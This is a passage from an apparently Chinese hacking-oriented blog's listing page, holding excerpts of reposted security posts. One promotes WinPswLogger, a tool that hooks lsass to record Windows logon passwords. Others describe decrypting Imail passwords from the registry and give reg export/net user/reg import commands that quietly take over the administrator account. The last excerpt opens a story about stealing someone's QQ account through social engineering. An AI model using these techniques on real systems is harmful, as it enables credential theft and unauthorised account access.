鬼仔's Blog

# 鬼仔：WinPswLogger就是可以记录windows登陆密码的东东

作者：LZX

下载：WinPswLogger_src.rar

作者：lzx

========原理：
windows的身份验证一般最终都是在lsass进程，默认模块是msv1_0.dll，而关键在其导出函数LsaApLogonUserEx2，
本程序通过注入代码到lsass进程hook LsaApLogonUserEx2，截取密码。只要有身份验证的过程，
LsaApLogonUserEx2就会触发，如ipc$,runsa,3389远程桌面登陆等。
阅读全文 »

原创作者：oldjun
文章来源：http://www.oldjun.com/
注：本文已经发表在《黑客手册》2009年05期

本 文章无技术含量，只是提供一个思路，思路来源于前不久暴出的那个ewebeditor2.16版本的上传漏洞。对于过滤了单引号或者做了post防注入的 站点，此方法也无能为力了；但对于很多对登陆端没做处理的网站，此方法值得一试，尤其是你已经知道源码了却不能执行命令(ACCESS数据库)或者对方能 报错( MYSQL数据库)。
阅读全文 »

# 鬼仔注：以前发过一个Imail密码加密算法及VBS实现

作者：tyw7

自动从注册表中读取并解密

‘imail password decrypt
‘code by tyw7  2009-4-15
‘http://www.tyw7.cn
阅读全文 »

鬼仔：我还没来得及测试。

作者：golds7n[LAG]
大小：9216 Bytes
MD5 ：7026217dc72aa564a2834995d7a7b017
来源：安全焦点

————————–
NtGod Private
Powered By golds7n[LAG]
————————–
Usage: NtGodMode.exe ON|OFF
阅读全文 »

来源：红狼

sa默认可以读sam键.应该。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\test.reg
根本不用克隆.
找到对应的sid.

鬼仔注：TrueCrypt是个好东西，可是我还没养成经常使用的习惯，总感觉麻烦。

来源：http://hi.baidu.com/tombkeeper/

TCCrack 使用说明

by [email protected]

这个工具有两个功能，一是显示TrueCrypt 虚拟卷的加密信息，二是有限地帮助
那些忘记密码的人们。

由于TrueCrypt本身设计使用Hash算法都是重复2000次（选择Whirlpool算法时是
1000次），再加上TrueCrypt 的虚拟映像文件中又没有保存具体使用的算法，每次解
密都要对几种算法一一进行尝试，这就意味着要brute force 是相当艰难的，除非在
密码学研究上有相关的突破性进展。所以这个工具最大的用处是在忘记自己的密码时，
阅读全文 »

鬼仔注：仔细看看能学到很多东西。

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
文章作者：fhod

说明：文章已发表于黑客X档案2007年第12期，转载请注明出处！
本文首发邪恶八进制.如需转载请注明出处!

PS:因为事搁很久..有些细节和证据已经无法拿出来了..所有以下有部分是根据我的回忆来陈述的..喜欢社工的朋友边看边想也许就知道我是否在编造故事了..如果你是刚入门对社工并不了解的朋友就暂且把他当成是一个小说来看好了..

事情起因
一个偶然的机会..在一次帮助朋友盗一人的QQ的时候..查到此号码是另一人所赠送..也就是她现在的男朋友..通过查看某女QQ空间的留言肯定了QQ号码为198***2就是她男朋友..当时一看跟我QQ一样是生日号..然后就看了下资料 阅读全文 »